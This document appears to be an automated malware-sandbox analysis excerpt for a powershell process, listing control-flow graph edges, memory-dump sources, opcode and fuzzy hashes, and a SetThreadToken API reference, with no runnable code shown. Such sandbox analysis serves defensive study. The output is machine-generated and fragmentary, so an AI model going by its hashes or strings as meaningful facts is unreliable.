426->443 444 780401d-7804024 426->444 433->326 448 7803df2-7803e17 433->448 434->435 446 78042db-78042e1 435->446 447 780434e-780435c 435->447 451 780400d 443->451 452 780400f-780401b 443->452 453 7804026-780402c 444->453 454 780403c-780407d 444->454 446->425 449 7804395-780439f 447->449 450 780435e-780437b 447->450 448->326 470 7803e1d-7803e24 448->470 457 78043a1-78043a5 449->457 458 78043a8-78043ae 449->458 466 78043e5-78043ea 450->466 467 780437d-780438f 450->467 451->444 452->444 459 7804030-780403a 453->459 460 780402e 453->460 463 78043b0-78043b2 458->463 464 78043b4-78043c0 458->464 459->454 460->454 469 78043c2-78043e2 463->469 464->469 466->467 467->449 473 7803e26-7803e41 470->473 474 7803e6a-7803e9d 470->474 479 7803e43-7803e49 473->479 480 7803e5b-7803e5f 473->480 487 7803ea4-7803ead 474->487 482 7803e4b 479->482 483 7803e4d-7803e59 479->483 484 7803e66-7803e68 480->484 482->480 483->480 484->487
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4']q$4']q$4']q$4']q
                                                                                                                  • API String ID: 0-1785108022
                                                                                                                  • Opcode ID: 1c6c7d70ada148aeb8ae99f2dab4f4a799425a50dbd7d2c1d64f2775574c6809
                                                                                                                  • Instruction ID: da11b231d228dd2f0cebaccd16c1c0cc7077b464561697751ba5f0c325598dab
                                                                                                                  • Opcode Fuzzy Hash: 1c6c7d70ada148aeb8ae99f2dab4f4a799425a50dbd7d2c1d64f2775574c6809
                                                                                                                  • Instruction Fuzzy Hash: 781238B17042869FCB559F68DC016ABBBA2AFE2314F14807AD549CF281DB35DC85C7E1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 491 897755a-897759b 492 89775a3-89775cf SetThreadToken 491->492 493 89775d1-89775d7 492->493 494 89775d8-89775f5 492->494 493->494
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2316853971.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_8970000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 784cf8c82854687a203bc210d715ca220b79b2139063d1039b2d6c83cd0bbcf9
                                                                                                                  • Instruction ID: 0087bf1a373ab80f8ef06ddb5da113b2b996d4804e24e107c4ee4d33b8199933
                                                                                                                  • Opcode Fuzzy Hash: 784cf8c82854687a203bc210d715ca220b79b2139063d1039b2d6c83cd0bbcf9
                                                                                                                  • Instruction Fuzzy Hash: 6F1143B1D003498FCB10DFAAC484B9EFFF8EB89320F24845AD418A7210C774A944CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 497 8977560-89775cf SetThreadToken 499 89775d1-89775d7 497->499 500 89775d8-89775f5 497->500 499->500
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2316853971.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_8970000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 82773de58cd7277156f3937e834a9c43cbfdca9861b3de5de4e81e9e275b5b31
                                                                                                                  • Instruction ID: 2e9759aa72c3d782b7ed15bc02a58ab72eadf4704fd4e02c096a2bea8377deb5
                                                                                                                  • Opcode Fuzzy Hash: 82773de58cd7277156f3937e834a9c43cbfdca9861b3de5de4e81e9e275b5b31
                                                                                                                  • Instruction Fuzzy Hash: 871122B5D003498FCB10DF9AC888B9EFBF8EB88320F24845AD419A7210C774A944CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 503 3066fe0-3066fff 504 3067105-3067143 503->504 505 3067005-3067008 503->505 532 306700a call 3067697 505->532 533 306700a call 306767c 505->533 506 3067010-3067022 508 3067024 506->508 509 306702e-3067043 506->509 508->509 515 30670ce-30670e7 509->515 516 3067049-3067059 509->516 521 30670f2-30670f3 515->521 522 30670e9 515->522 518 3067065-3067073 call 306bf10 516->518 519 306705b 516->519 525 3067079-306707d 518->525 519->518 521->504 522->521 526 306707f-306708f 525->526 527 30670bd-30670c8 525->527 528 3067091-30670a9 526->528 529 30670ab-30670b5 526->529 527->515 527->516 528->527 529->527 532->506 533->506
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (aq
                                                                                                                  • API String ID: 0-600464949
                                                                                                                  • Opcode ID: 56e6aad349f3460c37e29243d2a79d828f2b9fff359ef78618b701b31c1c6646
                                                                                                                  • Instruction ID: 8bb6396bab9d11d1f0fc1bef851fc9ac2a97a57d7d1ffd37a649d77ad63a8373
                                                                                                                  • Opcode Fuzzy Hash: 56e6aad349f3460c37e29243d2a79d828f2b9fff359ef78618b701b31c1c6646
                                                                                                                  • Instruction Fuzzy Hash: 7C415834A00205CFDB14DF68C468AAEBBF2EF8D714F284499E802EB395DA35DD01CB60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 535 306af98-306af9f 536 306afa6-306afaa 535->536 537 306afa1 call 306a984 535->537 538 306afac-306afb9 536->538 539 306afba-306b055 536->539 537->536 546 306b057-306b05d 539->546 547 306b05e-306b07b 539->547 546->547
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (&]q
                                                                                                                  • API String ID: 0-1343553580
                                                                                                                  • Opcode ID: 4b7a1a030878d3b25b66ad82f45e6292e24ea2f987eaa5be10eff8bda743bfae
                                                                                                                  • Instruction ID: 9fb08346e433d92d8422bcd6b112d41dbaf9a8d4e4ed344d66ddc472a3d617f1
                                                                                                                  • Opcode Fuzzy Hash: 4b7a1a030878d3b25b66ad82f45e6292e24ea2f987eaa5be10eff8bda743bfae
                                                                                                                  • Instruction Fuzzy Hash: BF21DCB1E042488FCB14DFAED404AAEBFF5EF89320F24846AD108E7340CA359805CBA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 652 78017b8-78017da 653 78017e0-78017e5 652->653 654 7801969-78019b5 652->654 655 78017e7-78017ed 653->655 656 78017fd-7801801 653->656 662 7801b04-7801b25 654->662 663 78019bb-78019c0 654->663 657 78017f1-78017fb 655->657 658 78017ef 655->658 660 7801914-780191e 656->660 661 7801807-780180b 656->661 657->656 658->656 664 7801920-7801929 660->664 665 780192c-7801932 660->665 666 780184b 661->666 667 780180d-780181e 661->667 684 7801b27-7801b34 662->684 685 7801b7b 662->685 668 78019c2-78019c8 663->668 669 78019d8-78019dc 663->669 671 7801934-7801936 665->671 672 7801938-7801944 665->672 670 780184d-780184f 666->670 667->654 682 7801824-7801829 667->682 674 78019ca 668->674 675 78019cc-78019d6 668->675 679 78019e2-78019e4 669->679 680 7801ab4-7801abe 669->680 670->660 681 7801855-7801859 670->681 677 7801946-7801966 671->677 672->677 674->669 675->669 686 78019f4 679->686 687 78019e6-78019f2 679->687 688 7801ac0-7801ac9 680->688 689 7801acc-7801ad2 680->689 681->660 690 780185f-7801863 681->690 693 7801841-7801849 682->693 694 780182b-7801831 682->694 695 7801b44 684->695 696 7801b36-7801b42 684->696 691 7801b7c-7801b86 685->691 697 78019f6-78019f8 686->697 687->697 699 7801ad4-7801ad6 689->699 700 7801ad8-7801ae4 689->700 701 7801865-780186e 690->701 702 7801886 690->702 703 7801b90-7801b96 691->703 704 7801b88-7801b8d 691->704 693->670 705 7801833 694->705 706 7801835-780183f 694->706 707 7801b46-7801b48 695->707 696->707 697->680 708 78019fe-7801a16 697->708 710 7801ae6-7801b01 699->710 700->710 711 7801870-7801873 701->711 712 7801875-7801882 701->712 709 7801889-7801911 702->709 715 7801b98-7801b9a 703->715 716 7801b9c-7801ba8 703->716 705->693 706->693 707->691 717 7801b4a-7801b50 707->717 727 7801a30-7801a34 708->727 728 7801a18-7801a1e 708->728 714 7801884 711->714 712->714 714->709 722 7801baa-7801bc1 715->722 716->722 724 7801b52-7801b54 717->724 725 7801b5e-7801b79 717->725 724->725 737 7801a3a-7801a41 727->737 730 7801a20 728->730 731 7801a22-7801a2e 728->731 730->727 731->727 739 7801a43-7801a46 737->739 740 7801a48-7801aa5 737->740 742 7801aaa-7801ab1 739->742 740->742
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 79d54a4f5d3d29b38bdaaf683af30aba26e18a92d7b7dd9d1d753c3893c88b66
                                                                                                                  • Instruction ID: 483e4bd38274cca4dee5278bb9ca8ccfed0a8655a81d73c5760cb8f6fcfe7b80
                                                                                                                  • Opcode Fuzzy Hash: 79d54a4f5d3d29b38bdaaf683af30aba26e18a92d7b7dd9d1d753c3893c88b66
                                                                                                                  • Instruction Fuzzy Hash: 75B136B1B0424E9FCB548F6DC8486AEBBE6AF95321F14C07AD445CB281DB31D991C7E2

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 938 30629f0-3062a1e 940 3062a24-3062a3a 938->940 941 3062af5-3062b37 938->941 942 3062a3f-3062a52 940->942 943 3062a3c 940->943 945 3062c51-3062c61 941->945 946 3062b3d-3062b56 941->946 942->941 951 3062a58-3062a65 942->951 943->942 948 3062b5b-3062b69 946->948 949 3062b58 946->949 948->945 956 3062b6f-3062b79 948->956 949->948 953 3062a67 951->953 954 3062a6a-3062a7c 951->954 953->954 954->941 960 3062a7e-3062a88 954->960 958 3062b87-3062b94 956->958 959 3062b7b-3062b7d 956->959 958->945 961 3062b9a-3062baa 958->961 959->958 962 3062a96-3062aa6 960->962 963 3062a8a-3062a8c 960->963 964 3062baf-3062bbd 961->964 965 3062bac 961->965 962->941 966 3062aa8-3062ab2 962->966 963->962 964->945 970 3062bc3-3062bd3 964->970 965->964 967 3062ab4-3062ab6 966->967 968 3062ac0-3062af4 966->968 967->968 972 3062bd5 970->972 973 3062bd8-3062be5 970->973 972->973 973->945 976 3062be7-3062bf7 973->976 977 3062bfc-3062c08 976->977 978 3062bf9 976->978 977->945 980 3062c0a-3062c24 977->980 978->977 981 3062c26 980->981 982 3062c29 980->982 981->982 983 3062c2e-3062c38 982->983 984 3062c3d-3062c50 983->984
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5802c5a59e852e1d4935fbde6ebbe6b919012d799b318beb2f7ac9aba82775ce
                                                                                                                  • Instruction ID: 22a4f4b9ce8c189b66b9dadbc379263b42bf1d608fa02af6466c00127d078a04
                                                                                                                  • Opcode Fuzzy Hash: 5802c5a59e852e1d4935fbde6ebbe6b919012d799b318beb2f7ac9aba82775ce
                                                                                                                  • Instruction Fuzzy Hash: BC914770A012099FCB15CF5CC4949AAFBF5FF48310B2989AAD855AB365C736FC51CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 17a660b02254dc3f55336dc10598918b5d9cb79e9fa6caa51014a6829c871a64
                                                                                                                  • Instruction ID: accd6a6629b63700ed3f1e53d97db56eca752f0bb01f13eb8f45d10c25122048
                                                                                                                  • Opcode Fuzzy Hash: 17a660b02254dc3f55336dc10598918b5d9cb79e9fa6caa51014a6829c871a64
                                                                                                                  • Instruction Fuzzy Hash: C851D2353052019FD744DB79D844A2E77EAFFC9718B1958AAE509CB356DB31EC01CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3f5d9ee917d2548d367d521aec5d9b62605a536f02b7ab6087b09bc8ef4326e3
                                                                                                                  • Instruction ID: f3961b04c8acdbcbb45d3e2e3644666825cb8968cfa769be08f491ccd95c4bd7
                                                                                                                  • Opcode Fuzzy Hash: 3f5d9ee917d2548d367d521aec5d9b62605a536f02b7ab6087b09bc8ef4326e3
                                                                                                                  • Instruction Fuzzy Hash: D4612AB1E012488FCB54DFA9C584A9DFBF1EF88310F25816AE809EB354EB749D41CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9aa89c87f82d118cdcf0d9bf297bb6ae3f15c1a4799afad048900ca2c4c93715
                                                                                                                  • Instruction ID: 2a444270a8a83611884a911c8a8babfc6d2931e6c91257bc50f194f6fcc1e967
                                                                                                                  • Opcode Fuzzy Hash: 9aa89c87f82d118cdcf0d9bf297bb6ae3f15c1a4799afad048900ca2c4c93715
                                                                                                                  • Instruction Fuzzy Hash: 195127B1E012489FCB54DFA9D484A9DFBF1FF88310F29806AE809EB355EB349945CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3b8efe10e16ee2534ddbdcd73e4b5244330fdb69897a66314c7f84ad406ad4dc
                                                                                                                  • Instruction ID: 593e4a8a19d93a5c7c5278503245081d3fe6ed9d4387bef4a7823db0bc4ba430
                                                                                                                  • Opcode Fuzzy Hash: 3b8efe10e16ee2534ddbdcd73e4b5244330fdb69897a66314c7f84ad406ad4dc
                                                                                                                  • Instruction Fuzzy Hash: FF4126B570010ADFDB555FA88C4C6BABBE6BF9A315F14806AE505CB281CB74CC94C7A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d17e1f3c46d7cc58c9ad91a712942c6cc1ab5a92d34a774830568dad1785e6
                                                                                                                  • Instruction ID: 6af694fe09d7bdfbc4ed762940639998d6940b0423fe9856560fe765d395c87c
                                                                                                                  • Opcode Fuzzy Hash: 27d17e1f3c46d7cc58c9ad91a712942c6cc1ab5a92d34a774830568dad1785e6
                                                                                                                  • Instruction Fuzzy Hash: FE419030A05244CFD70ACF64C964AA9BFF1AF8A708F195099D442EF3A6DB31DD45CB61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5947fbd061b4d5ee851e41b7a7da7681b9b72e0c97b63730478af2e1c4919c2c
                                                                                                                  • Instruction ID: b16ed2b998245b0832d68afbb6c6c848954534c22a13ebdb353c84ad5447183b
                                                                                                                  • Opcode Fuzzy Hash: 5947fbd061b4d5ee851e41b7a7da7681b9b72e0c97b63730478af2e1c4919c2c
                                                                                                                  • Instruction Fuzzy Hash: D2412BF0A04242EFCB618F24CD456A7BBA2AF90358F1481ADD900CFA96C735DD85C7E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de57f42fd721a5dd7ebd09491ad4088306e771fa85c5320ba745f3b0bede1460
                                                                                                                  • Instruction ID: 9def708c59ee0b5eb3ed559b7d8cd571e40f0b28fe9b68048e3a058ef9964367
                                                                                                                  • Opcode Fuzzy Hash: de57f42fd721a5dd7ebd09491ad4088306e771fa85c5320ba745f3b0bede1460
                                                                                                                  • Instruction Fuzzy Hash: 9D4127B4A016099FCB05CF58C4989AEFBF5FF48310B2585A9D815AB368C736FC51CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c7d31d7ba58cadaa4ecbdce753848955dec16c0e89d8f298b47c65da915a354d
                                                                                                                  • Instruction ID: c62b1dc9d7bc19c280fa1512096fea6b23ccd7e3fb1de775626dca17b7ff3882
                                                                                                                  • Opcode Fuzzy Hash: c7d31d7ba58cadaa4ecbdce753848955dec16c0e89d8f298b47c65da915a354d
                                                                                                                  • Instruction Fuzzy Hash: B631BC313002019FDB04EB78E840B9EB7D6EFC5214F248669E50ACB355DF75A845CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da5fed26b8ad6a611e0224a3b7b9fd0e80c7b245ff4a6c2d0f848be7ca75f923
                                                                                                                  • Instruction ID: 4eac37b9bf02a64ac280e260131cdba4033b3e28c21ec9cb6ae32fcc9a1ccd1d
                                                                                                                  • Opcode Fuzzy Hash: da5fed26b8ad6a611e0224a3b7b9fd0e80c7b245ff4a6c2d0f848be7ca75f923
                                                                                                                  • Instruction Fuzzy Hash: F8316DB0F012098FCB44EBB9C4947AEBBF6EF88310F248069E415EB355EB748C418B61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eed33214756edcec2daabb7703eb2ec3a331da2281101f23579251cf39dbdc58
                                                                                                                  • Instruction ID: 51fc018b22882d7e7ba0ff335e7debe9f9f1ae71aef0906cf005a6fc09bc979b
                                                                                                                  • Opcode Fuzzy Hash: eed33214756edcec2daabb7703eb2ec3a331da2281101f23579251cf39dbdc58
                                                                                                                  • Instruction Fuzzy Hash: C9314CB4F012099FDB44EFA9C4947AEBAF6EF88310F148069E415EB354EB749C018B61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 72d9e22fb13e13a5ca3985c7cfa6b4f0cd045df1a4ee4b783225d4cd0d5fb815
                                                                                                                  • Instruction ID: dfacecc44eec747424775e00a5384a0680bd7eb685f5cd7fc6dcdf892b7a2b47
                                                                                                                  • Opcode Fuzzy Hash: 72d9e22fb13e13a5ca3985c7cfa6b4f0cd045df1a4ee4b783225d4cd0d5fb815
                                                                                                                  • Instruction Fuzzy Hash: EB31C6B4A002459FDB00EF74D455AAE7BF2EF85300F2184AAD514BB396DB399D02CF61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 58978d6bf6bc64c7ca59edb93aa1217aad500ef75d3efc32d870bf2d2e1f4c2e
                                                                                                                  • Instruction ID: eec8f62ad2fcb0402f0f18871a2c3a9f066b0e955abfa1e044dfc2b3020ece8c
                                                                                                                  • Opcode Fuzzy Hash: 58978d6bf6bc64c7ca59edb93aa1217aad500ef75d3efc32d870bf2d2e1f4c2e
                                                                                                                  • Instruction Fuzzy Hash: 28313874A002048FCB54DF68D558A9EBBF2EF89314F14446DE406EB365DF719C85CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1dee9e913e36a38e5157d3a4fd0411e4405eeadb4f55a838203cb3bd29bbdba9
                                                                                                                  • Instruction ID: 195999d3390344380874ba801e2d660e8e639c863cd034994105ba44344dfaaa
                                                                                                                  • Opcode Fuzzy Hash: 1dee9e913e36a38e5157d3a4fd0411e4405eeadb4f55a838203cb3bd29bbdba9
                                                                                                                  • Instruction Fuzzy Hash: 8C310474A002088FCB54DB69D598A9EBBF2EF88314F14456DE806EB391DF71AC85CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1395ac4a293f6c1d2728e526badc3354c95ba94725aa496258816fc01bcbfb4e
                                                                                                                  • Instruction ID: 222097a929ed7343b0a2d2a2dfb0c39803b4f63e4bb43c406ddfc92233a63204
                                                                                                                  • Opcode Fuzzy Hash: 1395ac4a293f6c1d2728e526badc3354c95ba94725aa496258816fc01bcbfb4e
                                                                                                                  • Instruction Fuzzy Hash: 533161B4E002099FDB04EFB4D455AAE77F2EF84300F208469E515BB395DB39AD028F61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2250996617.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_edd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 763c79325d1defe74972451ffd3196429b35887fe5fad807eca91ac057c1bf6f
                                                                                                                  • Instruction ID: 4507b534c839506bf43125b07f6ce5fc232f6a1e60d31b4c5382a9ca6d1638c3
                                                                                                                  • Opcode Fuzzy Hash: 763c79325d1defe74972451ffd3196429b35887fe5fad807eca91ac057c1bf6f
                                                                                                                  • Instruction Fuzzy Hash: 5F21E271504200EFCB05DF54D9C0B26BB65FB88318F24C5AEE90A5A356C736D857CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c79fc039624d6d0a94e1a325d0eb6559803596488f46ab70e85d6f0c4cf41900
                                                                                                                  • Instruction ID: 0a52feeeaff781996fa1f060b4b22c9d3b62cb02e36f56be496f4d8b91f8cd36
                                                                                                                  • Opcode Fuzzy Hash: c79fc039624d6d0a94e1a325d0eb6559803596488f46ab70e85d6f0c4cf41900
                                                                                                                  • Instruction Fuzzy Hash: 9D3169709067848FDBA0CF6AD18878AFFF2EF89320F28845ED45D9B64AC7745445CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2250996617.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_edd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ba8ad845b2e8e68b4e2c3c5c10348b7ab1aa691cd2f4242d7dfb62030dbd70af
                                                                                                                  • Instruction ID: a4df813135b41cb07c6bf3e20ffee561909da01cf3f8c501077244e7ba350a8a
                                                                                                                  • Opcode Fuzzy Hash: ba8ad845b2e8e68b4e2c3c5c10348b7ab1aa691cd2f4242d7dfb62030dbd70af
                                                                                                                  • Instruction Fuzzy Hash: 7221F2B5504240EFDB14DF24D9C0B26BBA5EB88318F24C57ED90A5B386C33AD847CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 76a0c47ad4843a41752159e9aa12a0fee84e29cd967f95e5197e66e0741fb682
                                                                                                                  • Instruction ID: e93bae9dd621affe4a160e201fcfa236b86fefa38ba6073c0535b6aec3ed4a23
                                                                                                                  • Opcode Fuzzy Hash: 76a0c47ad4843a41752159e9aa12a0fee84e29cd967f95e5197e66e0741fb682
                                                                                                                  • Instruction Fuzzy Hash: AC215A709067448FDBA0CF6AC08878AFBF6EF89320F28C45ED85D97649D7746481CB61
